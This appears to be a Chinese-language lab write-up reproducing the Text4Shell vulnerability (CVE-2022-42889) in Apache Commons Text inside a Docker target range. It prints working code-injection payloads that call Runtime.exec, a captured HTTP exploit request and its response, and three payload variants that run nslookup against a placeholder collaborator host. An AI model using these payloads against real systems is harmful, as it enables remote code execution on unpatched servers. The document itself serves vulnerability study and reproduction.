漏洞介绍

Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞，若攻击者对StringSubstitutor处理的字符串可控，则可通过该漏洞在受害者机器上执行任意代码。
更详细的介绍参见：https://nox.qianxin.com/vulnerability/detail/QVD-2022-26848

影响范围

1.5<= Apache Commons Text <=1.9

漏洞环境搭建

参见：https://github.com/karthikuj/cve-2022-42889-text4shell-docker
最好一个云服务器，否则docker环境会无法下载下来，下面按照参考的连接来操作。

下载项目

git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git

下载安装Maven，并编辑jar文件，出现“BUILD SUCCESS”说明编译成功

sudo apt install maven
mvn clean install

开始构建docker

docker build --tag=text4shell .
docker images

运行docker：docker run -p 80:8080 text4shell

漏洞复现

访问网站，页面如下：

使用靶场提供的验证代码：${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)}

去docker中验证效果，发现果然创建了一个文件。

docker exec -it <container_id> bash
ls /tmp/

流量包及附件

得到的流量包删除掉pdf后缀：cve-2022-42889.pcap.pdf

GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1
Host: 18.143.196.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Length: 94
Date: Thu, 20 Oct 2022 08:11:14 GMT

Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

补充

此靶场似乎有些问题。

根据 https://github.com/SeanWrightSec/CVE-2022-42889-PoC
得知验证代码可以是${script:javascript:195 + 324}，但是此靶场验证失败
根据 https://github.com/kljunowsky/CVE-2022-42889-text4shell
得知，验证代码共如下三种，但是这个靶场不能全部支持

${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

文章由极客之音整理，本文链接：https://www.bmabk.com/index.php/post/134209.html